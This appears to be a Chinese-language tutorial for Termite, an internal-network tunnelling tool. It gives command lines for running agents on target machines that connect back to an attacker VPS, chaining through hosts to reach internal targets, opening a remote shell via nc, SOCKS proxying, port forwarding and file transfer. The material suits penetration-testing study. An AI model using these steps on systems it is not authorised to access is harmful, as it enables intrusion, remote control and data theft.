0x01 概述
1、工具介紹
Termite是一款內網穿透利器,分為管理端admin和代理端agent。它支持多平台、跳板機間正反向級聯、內置shell管理等。
Admin功能參數
Agent功能參數
Admin連接agent后的功能參數
另附官方使用說明:http://rootkiter.com/Termite/README.txt
0x02 不同場景中的使用
1、目標在公網
使用:
(1)目標A:agent_win32.exe -l 8888 (2)PC:admin_win32.exe -c 目標ip -p 8888
效果:
2、目標在內網(能出網)
使用:
(1)在vps運行:agent_win32.exe -l 8888 (2)在自己機器運行:admin_win32.exe -c vps_ip -p 8888 (3)在目標機器運行:agent_win32.exe -c vps_ip -p 8888
效果:
3、目標B在內網(不出網,通出網機器A)
(1)agent間正向連接
使用:
a.在vps運行:agent_win32.exe -l 8888 b.在PC運行:admin_win32.exe -c vps_ip -p 8888 c.在出網機器A運行:agent_win32.exe -c vps_ip -p 8888 d.在目標B運行:agent_win32.exe -l 9000 e.在PC運行:goto A_id → connect B_ip 9000
效果:
(2)agent間反向連接
說明:
a.在vps運行:agent_win32.exe -l 8888 b.在PC運行:admin_win32.exe -c vps_ip -p 8888 c.在出網機器A運行:agent_win32.exe -c vps_ip -p 8888 d.在PC運行:goto A_id -> listen 9000 e.在目標B運行:agent_win32.exe -c A_ip -p 9000
效果:
0x03 常用功能
1、socks代理
使用:
(1)goto 對應id (2)socks 1080
效果:
2、shell管理
使用:
(1)shell 4444
(2)nc -v 127.0.0.1 4444
效果:
3、端口轉發
使用:
lcxtran 本地端口 目標ip 目標端口
效果:
4、上傳下載文件
使用:
upfile 本地文件路徑 目標路徑
downfile 目標文件路徑 本地存放路徑
效果:
